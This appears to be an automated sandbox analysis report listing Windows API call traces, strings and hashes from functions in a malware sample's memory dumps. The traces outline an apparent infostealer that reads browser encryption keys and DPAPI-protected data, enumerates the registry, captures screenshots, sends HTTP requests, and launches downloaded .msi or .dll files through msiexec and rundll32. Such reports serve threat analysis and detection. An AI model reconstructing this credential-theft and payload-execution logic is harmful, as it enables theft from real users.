                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B25DFA
                                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 00B260D8
                                                        • lstrlen.KERNEL32(00000000), ref: 00B260E9
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B260FA
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B26101
                                                        • lstrlen.KERNEL32(00000000), ref: 00B26116
                                                        • memcpy.MSVCRT(?,00000000,00000000), ref: 00B2612D
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2613F
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B26158
                                                        • memcpy.MSVCRT(?), ref: 00B26165
                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00B26182
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B26196
                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00B261B3
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B26217
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B26224
                                                        • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B25E5F
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B2622E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                        • String ID:
                                                        • API String ID: 1703137719-0
                                                        • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                        • Instruction ID: b35fe3c464a53555783ee1ac5c60cd24fcd8bf8935b04e2ed4b86f30a75221fc
                                                        • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                        • Instruction Fuzzy Hash: F912DE72950228ABCB15EBA0DD95FEEB3B9BF15701F6041D9B146720A1EF702B88CF51
                                                        Function 0040C990 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00829930,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                        • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                        • StrStrA.SHLWAPI(?,00829990,00420B52), ref: 0040CAF7
                                                        • StrStrA.SHLWAPI(00000000,008299C0), ref: 0040CB1E
                                                        • StrStrA.SHLWAPI(?,0082A890,00000000,?,00421458,00000000,?,00000000,00000000,?,00826748,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                        • StrStrA.SHLWAPI(00000000,0082AAF0), ref: 0040CCB9
                                                          • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                          • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008267F8), ref: 0040C871
                                                          • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                          • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                        • StrStrA.SHLWAPI(?,0082AAF0,00000000,?,0042145C,00000000,?,00000000,008267F8), ref: 0040CD5A
                                                        • StrStrA.SHLWAPI(00000000,00826938), ref: 0040CD71
                                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                        • String ID:
                                                        • API String ID: 3555725114-3916222277
                                                        • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                        • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                        • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                        • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                        Function 00B2CBF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 00B2CCD3
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00B2CCF0
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00B2CCFC
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B2CD0F
                                                        • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 00B2CD1C
                                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B2CD40
                                                        • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 00B2CD5E
                                                        • StrStrA.SHLWAPI(00000000,0064A364), ref: 00B2CD85
                                                        • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 00B2CF09
                                                        • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 00B2CF20
                                                          • Part of subcall function 00B2CA87: memset.MSVCRT ref: 00B2CABA
                                                          • Part of subcall function 00B2CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B2CAD8
                                                          • Part of subcall function 00B2CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B2CAE3
                                                          • Part of subcall function 00B2CA87: memcpy.MSVCRT(?,?,?), ref: 00B2CB79
                                                        • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 00B2CFC1
                                                        • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 00B2CFD8
                                                          • Part of subcall function 00B2CA87: lstrcat.KERNEL32(?,00420B46), ref: 00B2CBAA
                                                          • Part of subcall function 00B2CA87: lstrcat.KERNEL32(?,00420B47), ref: 00B2CBBE
                                                          • Part of subcall function 00B2CA87: lstrcat.KERNEL32(?,00420B4E), ref: 00B2CBDF
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2D0AB
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B2D103
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                        • String ID:
                                                        • API String ID: 3555725114-3916222277
                                                        • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                        • Instruction ID: b77cf0ff4db214c715f219ee84ed5512e342b1029bc0843abd2cbf0f4a625d63
                                                        • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                        • Instruction Fuzzy Hash: 83E12272900208AFCB14EBA4DD91FEEB7B9AF15700F605199F146B31A1EF346A89CF51
                                                        Function 00418320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • RegOpenKeyExA.ADVAPI32(00000000,007F6688,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                        • wsprintfA.USER32 ref: 00418459
                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                        • String ID: - $%s\%s$?
                                                        • API String ID: 3246050789-3278919252
                                                        • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                        • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                        • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                        • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                        Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • memset.MSVCRT ref: 00410C1C
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                        • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                        • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                        • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                        • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                        • memset.MSVCRT ref: 00410CCD
                                                        • memset.MSVCRT ref: 00410CE1
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                        • String ID: .exe
                                                        • API String ID: 1395395982-4119554291
                                                        • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                        • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                        • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                        • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                        Function 00419010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateGlobalStream
                                                        • String ID: image/jpeg
                                                        • API String ID: 2244384528-3785015651
                                                        • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                        • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                        • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                        • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                        Function 004112D0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strtok_s.MSVCRT ref: 00411307
                                                        • strtok_s.MSVCRT ref: 00411750
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strtok_s$lstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 348468850-0
                                                        • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                        • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                        • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                        • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                        Function 00412E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExecuteShell$lstrcpy
                                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                        • API String ID: 2507796910-3625054190
                                                        • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                        • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                        • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                        • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                        Function 00414280 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 0041429E
                                                        • memset.MSVCRT ref: 004142B5
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                        • lstrcatA.KERNEL32(?,00829FC0), ref: 0041430B
                                                        • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                        • lstrcatA.KERNEL32(?,00829E10), ref: 00414333
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                          • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                          • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                        • StrStrA.SHLWAPI(?,0082B0F8), ref: 004143F3
                                                        • GlobalFree.KERNEL32(?), ref: 00414512
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                          • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                          • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                        • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                        • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                        • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                        • String ID:
                                                        • API String ID: 1191620704-0
                                                        • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                        • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                        • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                        • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                        Function 00B344E7 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.MSVCRT ref: 00B34505
                                                        • memset.MSVCRT ref: 00B3451C
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B34553
                                                        • lstrcat.KERNEL32(?,0064A30C), ref: 00B34572
                                                        • lstrcat.KERNEL32(?,?), ref: 00B34586
                                                        • lstrcat.KERNEL32(?,0064A5D8), ref: 00B3459A
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B38FF7: GetFileAttributesA.KERNEL32(00000000,?,00B21DBB,?,?,0042565C,?,?,00420E1F), ref: 00B39006
                                                          • Part of subcall function 00B29F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 00B29FA0
                                                          • Part of subcall function 00B29F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 00B29FF9
                                                          • Part of subcall function 00B29C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                          • Part of subcall function 00B29C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                          • Part of subcall function 00B29C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                          • Part of subcall function 00B29C27: ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                          • Part of subcall function 00B29C27: LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                          • Part of subcall function 00B29C27: CloseHandle.KERNEL32(000000FF), ref: 00B29D01
